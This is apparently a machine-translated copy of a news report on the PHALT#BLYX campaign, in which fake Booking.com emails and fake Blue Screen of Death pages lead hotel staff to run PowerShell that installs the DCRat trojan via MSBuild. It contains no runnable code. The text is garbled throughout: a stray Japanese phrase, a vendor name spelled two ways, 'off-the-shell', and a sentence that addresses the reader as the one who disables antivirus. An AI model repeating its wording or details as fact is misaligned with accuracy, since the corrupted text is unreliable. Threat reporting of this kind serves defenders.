Source: Securonics
Cybersecurity researchers have revealed details of a new campaign called PHALT#BLYX that leverages ClickFix-style lures to display fake Blue Screen of Death (BSoD) error fixes in attacks targeting European hospitality businesses.
According to cybersecurity firm Securonix, the end goal of the multi-stage campaign is to deliver a remote access Trojan known as DCRat. This activity was detected in late December 2025.
“During initial access, attackers use the lure of a fake Booking.com reservation cancellation to trick victims into running a malicious PowerShell command that silently fetches and executes remote code,” said researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee.
The attack chain begins with a phishing email impersonating Booking.com that contains a link to a fake website (e.g. “low-house”).[.]This message alerts the recipient of the unexpected reservation cancellation and prompts them to click a link to confirm the cancellation.
The website the victim is redirected to pretends to be Booking.com, serves a fake CAPTCHA page, and directs the victim to a fake BSoD page with “recovery instructions” to download Windows.[ファイル名を指定して実行]Open the dialog, paste the command and press Enter. This actually runs the PowerShell command that ultimately deploys DCRat.
Specifically, it involves a multi-step process that begins with the PowerShell dropper downloading the MSBuild project file (‘v.proj’) from ‘2fa-bns’.[.]This file is executed using ‘MSBuild.exe’ and executes an embedded payload responsible for configuring Microsoft Defender Antivirus exclusions to avoid detection, setting persistence on the host in the startup folder, and launching the RAT malware after downloading from the same location as the MSBuild project.
You can also completely disable the security program if it is found to be running with administrator privileges. Without elevated privileges, the malware enters a loop that triggers a Windows User Account Control (UAC) prompt three times every two seconds, hoping that the victim will grant the necessary permissions out of sheer frustration.
In parallel, the PowerShell code opens a legitimate Booking.com administrative page in the default browser as a distraction mechanism and takes steps to give the victim the impression that the action is legitimate.
DCRat, also known as Dark Crystal RAT, is an off-the-shell .NET Trojan that can collect sensitive information and extend functionality through a plugin-based architecture. It has the ability to connect to external servers, profile infected systems, and listen for commands from the servers, allowing attackers to record keystrokes, execute arbitrary commands, and deliver additional payloads, much like a cryptocurrency miner.
This campaign is an example of how attackers can leverage Living Off-The-Land (LotL) techniques, such as exploiting trusted system binaries such as ‘MSBuild.exe’, to take their attacks to the next stage, establish a deeper foothold, and maintain persistence within compromised hosts.
“The phishing emails specifically contain details of room rates in euros, suggesting that this campaign is actively targeting organizations in Europe,” Securonics said. “The use of Russian within the ‘v.proj’ MSBuild file associates this activity with Russian threat actors using DCRat.”
“Using customized MSBuild project files for proxy execution and actively tampering with Windows Defender exclusions demonstrates a deep understanding of modern endpoint protection mechanisms.”
Source link
